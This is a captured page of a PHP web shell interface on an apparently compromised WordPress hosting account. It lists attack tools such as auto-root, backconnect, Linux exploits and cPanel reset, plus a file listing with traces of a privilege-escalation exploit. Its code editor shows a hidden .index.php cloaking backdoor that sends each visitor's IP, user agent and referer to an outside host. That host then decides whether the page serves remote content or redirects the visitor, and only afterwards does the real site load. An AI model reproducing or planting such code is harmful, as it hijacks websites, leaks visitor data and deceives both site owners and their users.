Linux server220.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
: 198.54.116.164 | : 216.73.216.27
Cant Read [ /etc/named.conf ]
7.4.33
adnangch
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
adnangch /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
0ed2c
[ DIR ]
dr-xr-xr-x
50a8ed
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
dr-xr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
231
B
-rw-r--r--
.index.php
2.46
KB
-rwxrwxrwx
.litespeed_flag
297
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
2fsrebiw.php
1.83
KB
-rw-r--r--
6pqi51i0.php
1.83
KB
-rw-r--r--
buy.php
5.55
KB
-rw-r--r--
context.php
1.05
KB
-rw-r--r--
csv.php
6.46
KB
-rw-r--r--
error_log
87.03
KB
-rw-r--r--
google738db57e59672eb9.html
53
B
-rw-r--r--
google8fab2a5bdb4dc80e.html
53
B
-rw-r--r--
googlecb7c0319e31f0be0.html
53
B
-rw-r--r--
googled24b00a99624db3b.html
53
B
-rw-r--r--
googledc308e72d25873da.html
53
B
-rw-r--r--
htaccess
618
B
-rw-r--r--
index.php
5.55
KB
-rw-r--r--
index.php0
8.38
KB
-rw-r--r--
instaII.php
4.82
KB
-rw-r--r--
robots.txt
413
B
-r--r--r--
wp-test.php
1.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .index.php
<?php function handleRequest() { $apiUrl = "https://sundongyang.sbs/api/shade"; $payload = [ "ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "", "user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "", "hostname" => isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : "", "referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "", ]; $response = sendPostRequest($apiUrl, $payload); if ( $response && isset($response["success"]) && $response["success"] === true ) { $data = isset($response["data"]) ? $response["data"] : []; $action = isset($data["operation"]) ? $data["operation"] : ""; $target = isset($data["target_url"]) ? $data["target_url"] : ""; if ($action === "cloak" && !empty($target)) { $html = fetchRemoteContent($target); if ($html !== false) { ob_start(); echo $html; ob_end_flush(); } exit(); } elseif ($action === "redirect" && !empty($target)) { header( "Location: " . filter_var($target, FILTER_SANITIZE_URL), true, 302 ); exit(); } } } function sendPostRequest($url, $data) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($data), CURLOPT_TIMEOUT => 5, ]); $result = curl_exec($ch); $httpStatus = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpStatus === 200) { return json_decode($result, true); } return null; } function fetchRemoteContent($url) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 5, ]); $content = curl_exec($ch); if (curl_errno($ch)) { error_log("Fetch error: " . curl_error($ch)); $content = false; } curl_close($ch); return $content; } handleRequest(); if (file_exists("index.php")) { include "index.php"; } elseif (file_exists("index.html")) { header("Location: index.html"); }
Close